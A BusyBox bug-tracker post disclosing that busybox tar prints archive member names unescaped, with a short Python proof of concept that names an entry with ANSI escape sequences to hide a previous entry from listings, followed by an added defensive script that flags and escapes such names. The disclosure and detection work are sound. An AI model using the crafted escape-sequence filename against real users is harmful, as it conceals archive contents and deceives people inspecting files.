[Bug 16018] busybox tar allows un-escaped filenames to be printed to stdout/stderr

bugzilla at busybox.net bugzilla at busybox.net
Wed Jun 19 21:56:16 UTC 2024


https://bugs.busybox.net/show_bug.cgi?id=16018

--- Comment #2 from Ian Norton <ian.norton at entrust.com> ---
The following Python program demonstrates creating an archive with an entry
that can hide one or more previous entries from the list and verbose extract
output:

#!/usr/bin/env python3
import tarfile

with tarfile.open("bad.tar", "w") as tf:
    tf.add(__file__, arcname="hidden.txt")
    tf.add(__file__, arcname="\033[1A\033[1Ka-totally-innocent-filename.txt")

-- 
You are receiving this mail because:
You are on the CC list for the bug.
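
A defensive check for the behaviour shown in the comment above, as an added example that is not part of the original message or of BusyBox: it audits member names for terminal control characters before an archive is listed or extracted, and renders them escaped. The function names and the in-memory sample archive are constructed for illustration.

```python
import io
import tarfile
import unicodedata

# Cc = C0/C1 controls (ESC, CR, BS, ...), Cf = format characters (bidi
# overrides), Cs = lone surrogates produced by undecodable name bytes.
UNSAFE_CATEGORIES = ("Cc", "Cf", "Cs")

def build_sample() -> bytes:
    """Constructed sample: in-memory archive with the comment's two names."""
    buf = io.BytesIO()
    data = b"constructed sample\n"
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name in ("hidden.txt",
                     "\033[1A\033[1Ka-totally-innocent-filename.txt"):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()

def is_unsafe(ch: str) -> bool:
    return unicodedata.category(ch) in UNSAFE_CATEGORIES

def escape_name(name: str) -> str:
    """Return the name with unsafe characters shown as visible escapes."""
    out = []
    for ch in name:
        if ch == "\\":
            out.append("\\\\")  # keep the escaped form unambiguous
        elif is_unsafe(ch):
            code = ord(ch)
            out.append(f"\\x{code:02x}" if code < 0x100 else f"\\u{code:04x}")
        else:
            out.append(ch)
    return "".join(out)

def audit_tar(data: bytes) -> list:
    """Return (escaped_name, flagged) per member; nothing is extracted."""
    results = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:") as tf:
        for member in tf:
            # Link targets are printed by verbose listings too, so check both.
            flagged = any(is_unsafe(c) for c in member.name + member.linkname)
            results.append((escape_name(member.name), flagged))
    return results

if __name__ == "__main__":
    for shown, flagged in audit_tar(build_sample()):
        print(("SUSPICIOUS " if flagged else "ok         ") + shown)
```

Run against the sample, both entries appear in the output and the second is flagged, with its escape bytes printed as literal `\x1b` text.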

